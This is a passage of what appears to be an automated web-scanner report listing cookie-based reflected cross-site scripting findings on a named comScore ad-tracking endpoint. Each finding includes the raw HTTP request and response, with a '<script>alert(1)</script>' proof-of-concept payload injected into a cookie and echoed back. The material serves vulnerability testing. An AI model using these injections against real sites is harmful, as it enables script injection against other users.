Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p82806590=exp=3&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu May 12 13:28:26 2011&prad=62874418&arc=40422013&; expires=Wed 10-Aug-2011 13:28:26 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1305206906; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25878

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"62874418",Pid:"p82806590",Arc:"40422013",Location:CO
...[SNIP]...
Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&', "ar_p85001580": 'exp=1&initExp=Tue May 10 13:28:54 2011&recExp=Tue May 10 13:28:54 2011&prad=62165328&arc=41861280&45b83<script>alert(1)</script>dbcb87bd638', "ar_p92429851": 'exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&', "ar_p81479006": 'exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19
...[SNIP]...

2.145. http://ar.voicefive.com/bmx3/broker.pli [ar_p90175839 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p90175839 cookie is copied into the HTML document as plain text between tags. The payload 4cf27<script>alert(1)</script>a4d64bede87 was submitted in the ar_p90175839 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p82806590&PRAd=62874418&AR_C=40422013 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&4cf27<script>alert(1)</script>a4d64bede87; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p85001580=exp=1&initExp=Tue May 10 13:28:54 2011&recExp=Tue May 10 13:28:54 2011&prad=62165328&arc=41861280&; ar_p82806590=exp=2&initExp=Thu Apr 28 21:29:14 2011&recExp=Tue May 10 18:23:11 2011&prad=58779362&arc=41840773&; ar_p97174789=exp=50&initExp=Sun Apr 24 12:09:48 2011&recExp=Wed May 11 15:02:57 2011&prad=253732016&arc=194941096&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 12 May 2011 13:28:17 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p82806590=exp=3&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu May 12 13:28:17 2011&prad=62874418&arc=40422013&; expires=Wed 10-Aug-2011 13:28:17 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1305206897; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25878

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"62874418",Pid:"p82806590",Arc:"40422013",Location:CO
...[SNIP]...
27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&4cf27<script>alert(1)</script>a4d64bede87', "UID": '875e3f1e-184.84.247.65-1303349046', "ar_p91136705": 'exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&', "ar_p85001580": 'exp=1&initExp=
...[SNIP]...

2.146. http://ar.voicefive.com/bmx3/broker.pli [ar_p90452457 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p90452457 cookie is copied into the HTML document as plain text between tags. The payload c3519<script>alert(1)</script>d44fa25d073 was submitted in the ar_p90452457 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p82806590&PRAd=62874418&AR_C=40422013 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&c3519<script>alert(1)</script>d44fa25d073; ar_p85001580=exp=1&initExp=Tue May 10 13:28:54 2011&recExp=Tue May 10 13:28:54 2011&prad=62165328&arc=41861280&; ar_p82806590=exp=2&initExp=Thu Apr 28 21:29:14 2011&recExp=Tue May 10 18:23:11 2011&prad=58779362&arc=41840773&; ar_p97174789=exp=50&initExp=Sun Apr 24 12:09:48 2011&recExp=Wed May 11 15:02:57 2011&prad=253732016&arc=194941096&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 12 May 2011 13:28:26 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p82806590=exp=3&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu May 12 13:28:26 2011&prad=62874418&arc=40422013&; expires=Wed 10-Aug-2011 13:28:26 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1305206906; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25878

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"62874418",Pid:"p82806590",Arc:"40422013",Location:CO
...[SNIP]...
Exp=Tue May 10 18:23:11 2011&prad=58779362&arc=41840773&', "ar_s_p81479006": '1', "ar_p90452457": 'exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&c3519<script>alert(1)</script>d44fa25d073', "ar_p84552060": 'exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:
...[SNIP]...

2.147. http://ar.voicefive.com/bmx3/broker.pli [ar_p91136705 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p91136705 cookie is copied into the HTML document as plain text between tags. The payload 51f3f<script>alert(1)</script>d388c365221 was submitted in the ar_p91136705 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p82806590&PRAd=62874418&AR_C=40422013 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&51f3f<script>alert(1)</script>d388c365221; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p85001580=exp=1&initExp=Tue May 10 13:28:54 2011&recExp=Tue May 10 13:28:54 2011&prad=62165328&arc=41861280&; ar_p82806590=exp=2&initExp=Thu Apr 28 21:29:14 2011&recExp=Tue May 10 18:23:11 2011&prad=58779362&arc=41840773&; ar_p97174789=exp=50&initExp=Sun Apr 24 12:09:48 2011&recExp=Wed May 11 15:02:57 2011&prad=253732016&arc=194941096&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 12 May 2011 13:28:18 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p82806590=exp=3&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu May 12 13:28:18 2011&prad=62874418&arc=40422013&; expires=Wed 10-Aug-2011 13:28:18 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1305206898; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25878

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"62874418",Pid:"p82806590",Arc:"40422013",Location:CO
...[SNIP]...
&prad=3992125865291151&arc=6108747&', "UID": '875e3f1e-184.84.247.65-1303349046', "ar_p91136705": 'exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&51f3f<script>alert(1)</script>d388c365221', "ar_p85001580": 'exp=1&initExp=Tue May 10 13:28:54 2011&recExp=Tue May 10 13:28:54 2011&prad=62165328&arc=41861280&', "ar_p92429851": 'exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:4
...[SNIP]...

2.148. http://ar.voicefive.com/bmx3/broker.pli [ar_p91300630 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p91300630 cookie is copied into the HTML document as plain text between tags. The payload b2d2d<script>alert(1)</script>a8f3cf0f359 was submitted in the ar_p91300630 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p82806590&PRAd=62874418&AR_C=40422013 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&b2d2d<script>alert(1)</script>a8f3cf0f359; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p85001580=exp=1&initExp=Tue May 10 13:28:54 2011&recExp=Tue May 10 13:28:54 2011&prad=62165328&arc=41861280&; ar_p82806590=exp=2&initExp=Thu Apr 28 21:29:14 2011&recExp=Tue May 10 18:23:11 2011&prad=58779362&arc=41840773&; ar_p97174789=exp=50&initExp=Sun Apr 24 12:09:48 2011&recExp=Wed May 11 15:02:57 2011&prad=253732016&arc=194941096&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 12 May 2011 13:28:17 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p82806590=exp=3&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu May 12 13:28:17 2011&prad=62874418&arc=40422013&; expires=Wed 10-Aug-2011 13:28:17 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1305206897; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25878

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"62874418",Pid:"p82806590",Arc:"40422013",Location:CO
...[SNIP]...
Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&b2d2d<script>alert(1)</script>a8f3cf0f359' };
COMSCORE.BMX.Broker.GlobalConfig={
"urlExcludeList": "http://photobucket.com/$|zone.msn.com|xbox.com|www.aol.com/$|http://Webmail.aol.com/$|http://travel.aol.com/$|http://netscape.aol.com/$|http
...[SNIP]...

2.149. http://ar.voicefive.com/bmx3/broker.pli [ar_p92429851 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p92429851 cookie is copied into the HTML document as plain text between tags. The payload 2e933<script>alert(1)</script>2db6105bb74 was submitted in the ar_p92429851 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p82806590&PRAd=62874418&AR_C=40422013 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&2e933<script>alert(1)</script>2db6105bb74; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p85001580=exp=1&initExp=Tue May 10 13:28:54 2011&recExp=Tue May 10 13:28:54 2011&prad=62165328&arc=41861280&; ar_p82806590=exp=2&initExp=Thu Apr 28 21:29:14 2011&recExp=Tue May 10 18:23:11 2011&prad=58779362&arc=41840773&; ar_p97174789=exp=50&initExp=Sun Apr 24 12:09:48 2011&recExp=Wed May 11 15:02:57 2011&prad=253732016&arc=194941096&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 12 May 2011 13:28:18 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p82806590=exp=3&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu May 12 13:28:18 2011&prad=62874418&arc=40422013&; expires=Wed 10-Aug-2011 13:28:18 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1305206898; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25878

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"62874418",Pid:"p82806590",Arc:"40422013",Location:CO
...[SNIP]...
Apr 28 21:29:14 2011&recExp=Tue May 10 18:23:11 2011&prad=58779362&arc=41840773&', "ar_p92429851": 'exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&2e933<script>alert(1)</script>2db6105bb74', "ar_p81479006": 'exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&', "ar_s_p81479006": '1', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 201
...[SNIP]...

2.150. http://ar.voicefive.com/bmx3/broker.pli [ar_p97174789 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p97174789 cookie is copied into the HTML document as plain text between tags. The payload b3895<script>alert(1)</script>0953d20e172 was submitted in the ar_p97174789 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p82806590&PRAd=62874418&AR_C=40422013 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p85001580=exp=1&initExp=Tue May 10 13:28:54 2011&recExp=Tue May 10 13:28:54 2011&prad=62165328&arc=41861280&; ar_p82806590=exp=2&initExp=Thu Apr 28 21:29:14 2011&recExp=Tue May 10 18:23:11 2011&prad=58779362&arc=41840773&; ar_p97174789=exp=50&initExp=Sun Apr 24 12:09:48 2011&recExp=Wed May 11 15:02:57 2011&prad=253732016&arc=194941096&b3895<script>alert(1)</script>0953d20e172; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 12 May 2011 13:28:27 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p82806590=exp=3&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu May 12 13:28:27 2011&prad=62874418&arc=40422013&; expires=Wed 10-Aug-2011 13:28:27 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1305206907; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
